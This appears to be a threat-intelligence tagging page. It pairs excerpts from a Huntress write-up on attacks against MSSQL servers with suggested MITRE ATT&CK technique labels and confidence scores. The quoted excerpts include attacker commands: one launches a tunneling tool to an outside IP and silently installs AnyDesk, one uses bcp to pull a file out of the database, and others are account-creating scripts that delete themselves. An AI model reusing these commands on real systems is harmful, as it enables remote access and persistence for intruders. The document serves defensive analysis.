“translates the turkish phrase “ yeni kullanıcı hesabı olusturuldu ” to “ new user account created ” in english. further, the words “ sifre ” and “ isim ” also appear to be turkish, and translate to “ password ” and “ name ”, respectively. the contents of the second script file, u…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
91%
“launch a tunneling tool and anydesk : c : \ users \ public \ music \ 4. exe - - ip " 2. 57. 149 [. ] 233 " - - port " 3377 " - - install c : \ users \ public \ music \ ad. exe - - install c : \ " program files ( x86 ) " \ - - silent net start " remote desktop configuration manage…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.003Windows Command Shell
83%
“of what ’ s usually observed when an mssql server has been compromised ; specifically, the use of the mssql native bulk copy command to extract a file from the database, as illustrated in the following command line : cmd / c bcp " select binarytable from ugnzbdzbsi " queryout " c…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1136.001Local Account
81%
“each of the scripts ended in a line that deleted the file itself, and at the time that the incident was being investigated, each of the script files were found within the file system of the endpoint. again, there were two script files that each created a user account. the content…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1505.001SQL Stored Procedures
68%
“attacking mssql servers | huntress ever since the sql slammer worm of 2003, and even before then, mssql database servers exposed to the internet with default configurations have been targeted, and in many cases, exploited. more recently, securonix shared a threat research securit…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.003Windows Command Shell
42%
“attacking mssql servers | huntress ever since the sql slammer worm of 2003, and even before then, mssql database servers exposed to the internet with default configurations have been targeted, and in many cases, exploited. more recently, securonix shared a threat research securit…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
In addition to social engineering attacks, threat actors target organizations' attack surface, looking for exposed services and applications to gain access into an infrastructure. Microsoft SQL database servers have long been a target for attackers.